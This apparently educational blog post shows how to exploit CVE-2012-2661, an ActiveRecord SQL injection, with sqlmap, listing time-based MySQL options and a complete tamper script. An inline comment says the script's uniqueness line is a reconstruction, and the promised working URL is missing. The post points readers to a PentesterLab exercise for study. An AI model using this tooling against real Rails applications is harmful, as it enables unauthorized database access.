After some work, I managed to get the ActiveRecord bug to work with sqlmap...
First, some notes on sqlmap:
- I'm pretty disappointed by how tamper scripts work: it would be nicer to have access to the full HTTP request instead of just the payload... maybe a patch to submit. If I had full access to the HTTP request, I'd have been able to do a full rewrite from id=1 to the right payload... anyway.
- It's really time consuming to do time-based exploitation, since sqlmap doesn't try to go under 1 second for the sleep()...
So, first, the options I'm using:
- --tamper tamper/cve-2012-2661.py : my tamper script, see below
- --dbms=Mysql : the back-end is MySQL, so no time is wasted on checks for other databases
- --technique=T : time-based exploitation only, so no time is wasted on other techniques
- --batch : I don't want to answer questions...
- --proxy=http://127.0.0.1:18080 : always use a proxy for debugging purposes
- --banner : I just want to dump the version
The tamper script is pretty simple to write:
- You need to make sure each request is unique: I'm using the current time (random isn't guaranteed unique, time is ;))
- You need to take care of the encoding when using a tamper script, since the payload is inserted into the URL
And the source code of the tamper script is:
% cat tamper/cve-2012-2661.py
#!/usr/bin/env python
"""
Copyright (c) 2012 pentesterlab (https://www.pentesterlab.com)

sqlmap tamper script for CVE-2012-2661 (ActiveRecord SQL injection).
"""

from lib.core.enums import PRIORITY
from datetime import datetime

__priority__ = PRIORITY.LOW


def dependencies():
    # no external dependencies to check
    pass


def tamper(payload, **kwargs):
    # sqlmap calls tamper() on every payload; newer versions also pass kwargs
    retVal = payload
    # that's disgusting, encoding =,+,>
    retVal = retVal.replace("=", "%3d")
    retVal = retVal.replace("+", "%2b")
    retVal = retVal.replace(">", "%3e")
    # make the request unique
    # NOTE: the author's original line is not shown on this page; appending the
    # current time inside an inline MySQL comment is an assumption, chosen
    # because /* ... */ is valid wherever whitespace is and needs no URL encoding
    retVal += "/*%s*/" % datetime.now().strftime("%Y%m%d%H%M%S%f")
    return retVal
Now, you just need to find the correct URL... and that's the hard part. After a lot of testing, the following URL works:
Now you're able to test and exploit this bug using sqlmap...
If you want a real understanding of the vulnerability and not just ./hack..., you should check out PentesterLab's free exercise on this bug: CVE-2012-2661: ActiveRecord SQL injection.